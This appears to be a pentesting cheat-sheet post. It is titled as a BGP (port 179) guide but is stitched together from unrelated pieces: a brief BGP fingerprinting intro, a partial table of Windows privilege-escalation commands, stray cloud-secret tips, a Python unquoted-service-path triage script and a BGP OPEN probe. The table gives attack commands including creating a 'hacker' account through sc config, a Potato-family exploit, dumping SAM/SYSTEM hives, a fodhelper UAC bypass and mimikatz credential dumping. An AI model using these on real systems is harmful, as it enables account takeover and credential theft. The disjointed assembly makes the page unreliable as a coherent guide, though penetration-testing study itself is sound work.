# HackTricks Port 179: Best Pentesting Practices for Border Gateway Protocol (BGP)

TCP port 179 is used by the Border Gateway Protocol (BGP), the fundamental routing protocol that acts as the "glue" holding the global internet together. When assessing an infrastructure's perimeter, discovering an exposed port 179 during an nmap scan represents a high-severity architectural risk. Unlike standard web protocols, BGP dictates traffic paths between Autonomous Systems (AS). A misconfiguration or a lack of authentication on this port can allow attackers to intercept, manipulate, or completely blackhole enterprise and carrier-grade traffic.

Analyze the banner of the BGP service to identify the device type and vendor. BGP has no text banner; the closest equivalent is the peer's first message after you send it an OPEN. An OPEN reply discloses the router's AS number, BGP identifier (router ID) and advertised capabilities, which narrow down the platform. A NOTIFICATION discloses why it refused you: for example Cease / Connection Rejected, or OPEN Message Error / Bad Peer AS when a neighbor is configured for your address but with a different AS. If the TCP handshake itself never completes, suspect TCP MD5 signatures (RFC 2385), GTSM/TTL security or an ACL rather than a closed port.

But with thousands of pages, where do you focus? We have distilled HackTricks into this post.

Note: This is a long list; use Ctrl/Cmd+F to jump to sections.

| # | Trick | Command / Technique |
|---|-------|---------------------|
| 31 | AlwaysInstallElevated MSI | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated (check the same key under HKCU; both must be 1) |
| 32 | Unquoted service paths | wmic service get name,displayname,pathname,startmode |
| 33 | Weak service permissions (sc.exe) | sc config SERVICE binpath= "cmd.exe /c net user hacker pass /add" (note the space after binpath=) |
| 34 | SeImpersonate (Potato family) | JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t * |
| 35 | Saved RDP credentials | cmdkey /list → runas /savecred /user:<user> cmd.exe |
| 36 | SAM & SYSTEM backup | reg save hklm\sam sam.save and reg save hklm\system system.save |
| 37 | Writable %PATH% folders | check each PATH entry with icacls, then drop a binary (e.g. whoami.exe) that a privileged process calls without a full path |
| 38 | PrintNightmare (CVE-2021-34527) | MS-RPRN → SharpPrintNightmare.exe |
| 39 | UAC bypass – fodhelper | reg add HKCU\Software\Classes\ms-settings\shell\open\command (empty DelegateExecute value, default value = payload, then run fodhelper.exe) |
| 40 | Logon scripts from registry | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" |
| ... | ... | ... |
| 60 | Mimikatz sekurlsa | sekurlsa::logonpasswords |

Attacking Docker images on registries - Pull images to inspect layers for embedded keys or secrets.
Cloudformation / ARM template secrets in repos - Search IaC for embedded secrets; use truffleHog.
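Row 32 of the table above only enumerates service paths; the useful part is working out which file names Windows would try before reaching the real binary, and which of those land in a directory you can write to. The Python below is an added example, not code from the page or from HackTricks. It implements the CreateProcess prefix-splitting rule for unquoted paths (C:\Program.exe, then C:\Program Files\Vendor.exe, and so on) and applies it to constructed service entries shaped like the wmic output; the set of writable directories is also constructed for the demo, since on a real host you would establish it with icacls.

```python
"""Unquoted service path triage. Added example, not from the original page.

Input is shaped like `wmic service get name,displayname,pathname,startmode`
after parsing into (name, pathname, startmode). Sample services and writable
directories are constructed for the demo; check real ACLs with icacls.
"""
import ntpath


def hijack_candidates(pathname):
    """Paths CreateProcess tries, in order, for an unquoted path containing spaces.

    Returns [] for quoted paths and for paths whose executable part has no space.
    A binary written without a .exe suffix shows up as the last candidate.
    """
    path = pathname.strip()
    if not path or path.startswith('"'):
        return []
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the real executable; the rest are arguments
        candidates.append(prefix + ".exe")
    return candidates


def find_unquoted(services, writable_dirs=()):
    """Return findings for services with unquoted, space-containing paths.

    Binaries under C:\\Windows are skipped, mirroring the usual
    `wmic ... | findstr /i /v "C:\\Windows"` filter. A candidate is marked
    exploitable when its parent directory is in writable_dirs.
    """
    writable = {d.rstrip("\\").lower() for d in writable_dirs}
    findings = []
    for name, pathname, startmode in services:
        if pathname.strip().lower().startswith("c:\\windows\\"):
            continue
        cands = hijack_candidates(pathname)
        if not cands:
            continue
        findings.append({
            "service": name,
            "startmode": startmode,
            "candidates": cands,
            "exploitable": [
                c for c in cands
                if ntpath.dirname(c).rstrip("\\").lower() in writable
            ],
        })
    return findings


# Constructed sample rows (name, pathname, startmode), not real host output.
SAMPLE_SERVICES = [
    ("VulnSvc", r"C:\Program Files\Vendor App\svc.exe -k netsvcs", "Auto"),
    ("SafeSvc", r'"C:\Program Files\Vendor App\safe.exe" -k', "Auto"),
    ("NoSpace", r"C:\Tools\agent.exe", "Manual"),
    ("SysSvc", r"C:\Windows\System32\svchost.exe -k LocalService", "Auto"),
]
# Constructed: a directory with a misconfigured ACL that the demo user can write to.
SAMPLE_WRITABLE = [r"C:\Program Files"]


if __name__ == "__main__":
    for finding in find_unquoted(SAMPLE_SERVICES, SAMPLE_WRITABLE):
        print(finding)
```

Only the first finding matters in practice: an Auto-start service whose candidate path sits in a writable directory is a restart-or-reboot away from SYSTEM. Candidates in C:\ root or C:\Program Files are usually not writable by standard users, so the icacls check is what turns the list into a result.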
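The "banner" step in the BGP section above amounts to sending an OPEN and decoding whatever comes back. The Python below is an added example, not code from the page or from HackTricks: it builds a BGP OPEN with a 4-octet AS capability, parses the peer's reply into the fields that fingerprint the device (AS number, router ID, hold time, capabilities) or the NOTIFICATION error/subcode that explains a refusal, and wraps that in a `probe()` function for live use. The wire format follows RFC 4271, RFC 5492, RFC 6793 and RFC 4486; the sample replies are constructed byte strings, not captured traffic, and the AS number, router ID and host names are placeholders.

```python
"""BGP (TCP/179) OPEN probe and reply decoder. Added example, not from the page.

Message layout per RFC 4271; capabilities per RFC 5492/6793; Cease subcodes per
RFC 4486. SAMPLE_* values below are constructed, not captured from a real router.
"""
import socket
import struct

MARKER = b"\xff" * 16
OPEN, UPDATE, NOTIFICATION, KEEPALIVE = 1, 2, 3, 4
AS_TRANS = 23456  # 2-byte placeholder when the real AS needs 4 bytes

ERROR_CODES = {1: "Message Header Error", 2: "OPEN Message Error",
               3: "UPDATE Message Error", 4: "Hold Timer Expired",
               5: "Finite State Machine Error", 6: "Cease"}
OPEN_SUBCODES = {1: "Unsupported Version Number", 2: "Bad Peer AS",
                 3: "Bad BGP Identifier", 4: "Unsupported Optional Parameter",
                 6: "Unacceptable Hold Time", 7: "Unsupported Capability"}
CEASE_SUBCODES = {1: "Maximum Number of Prefixes Reached", 2: "Administrative Shutdown",
                  3: "Peer De-configured", 4: "Administrative Reset",
                  5: "Connection Rejected", 6: "Other Configuration Change",
                  7: "Connection Collision Resolution", 8: "Out of Resources"}
CAPABILITY_NAMES = {1: "Multiprotocol", 2: "Route Refresh", 64: "Graceful Restart",
                    65: "4-octet AS", 69: "ADD-PATH", 70: "Enhanced Route Refresh"}


def bgp_message(msg_type, body):
    """Prepend the 19-byte header: 16-byte marker, total length, type."""
    return MARKER + struct.pack("!HB", 19 + len(body), msg_type) + body


def build_open(my_as, bgp_id, hold_time=90):
    """OPEN carrying a 4-octet AS capability and an IPv4 unicast MP capability."""
    caps = struct.pack("!BBI", 65, 4, my_as)        # code 65, len 4, AS as 32-bit
    caps += struct.pack("!BBHBB", 1, 4, 1, 0, 1)     # code 1: AFI 1 (IPv4), SAFI 1
    opt = struct.pack("!BB", 2, len(caps)) + caps    # optional parameter type 2 = Capabilities
    two_byte_as = my_as if my_as <= 65535 else AS_TRANS
    body = struct.pack("!BHH4sB", 4, two_byte_as, hold_time,
                       socket.inet_aton(bgp_id), len(opt)) + opt
    return bgp_message(OPEN, body)


def parse_capabilities(opt_params):
    """Walk the OPEN optional parameters and return the capabilities announced."""
    caps, i = [], 0
    while i + 2 <= len(opt_params):
        ptype, plen = opt_params[i], opt_params[i + 1]
        value = opt_params[i + 2:i + 2 + plen]
        i += 2 + plen
        if ptype != 2:
            continue
        j = 0
        while j + 2 <= len(value):
            code, clen = value[j], value[j + 1]
            cval = value[j + 2:j + 2 + clen]
            j += 2 + clen
            entry = {"code": code, "name": CAPABILITY_NAMES.get(code, f"code {code}")}
            if code == 65 and clen == 4:
                entry["as4"] = struct.unpack("!I", cval)[0]
            caps.append(entry)
    return caps


def parse_message(data):
    """Decode the first BGP message in data; raise ValueError if it is not BGP."""
    if len(data) < 19 or data[:16] != MARKER:
        raise ValueError("not a BGP message (bad marker or truncated)")
    length, msg_type = struct.unpack("!HB", data[16:19])
    if length < 19 or length > 4096 or len(data) < length:
        raise ValueError("bad length field")
    body = data[19:length]
    if msg_type == OPEN:
        version, peer_as, hold, bgp_id, opt_len = struct.unpack("!BHH4sB", body[:10])
        caps = parse_capabilities(body[10:10 + opt_len])
        as4 = next((c["as4"] for c in caps if "as4" in c), None)
        return {"type": "OPEN", "version": version,
                "as": as4 if as4 is not None else peer_as, "hold_time": hold,
                "bgp_id": socket.inet_ntoa(bgp_id),
                "capabilities": [c["name"] for c in caps]}
    if msg_type == NOTIFICATION:
        code, sub = body[0], body[1]
        subcodes = {2: OPEN_SUBCODES, 6: CEASE_SUBCODES}.get(code, {})
        return {"type": "NOTIFICATION", "error": ERROR_CODES.get(code, f"code {code}"),
                "subcode": subcodes.get(sub, f"subcode {sub}"), "data": body[2:]}
    if msg_type == KEEPALIVE:
        return {"type": "KEEPALIVE"}
    return {"type": f"type {msg_type}", "body": body}


def probe(host, port=179, my_as=65001, bgp_id="192.0.2.1", timeout=5.0):
    """Send our OPEN and decode the first reply. A connect timeout usually means
    TCP MD5 / GTSM / ACL rather than a closed port; a reset with no message means
    the peer dropped us before speaking BGP."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_open(my_as, bgp_id))
        return parse_message(s.recv(4096))  # single recv is enough for one OPEN/NOTIFICATION


# Constructed reply from a router that accepted the TCP session and answered our OPEN.
SAMPLE_PEER_OPEN = build_open(my_as=4200000000, bgp_id="10.255.0.1", hold_time=180)
# Constructed NOTIFICATION: OPEN Message Error / Bad Peer AS.
SAMPLE_BAD_PEER_AS = bgp_message(NOTIFICATION, bytes([2, 2]))
```

Run `probe("<router>")` from a source address the target might have a neighbor statement for; an OPEN back is the fingerprint (a 4-byte AS only appears via capability 65, which is why the decoder prefers it over the 2-byte field), while a NOTIFICATION tells you how far the router's policy let you in.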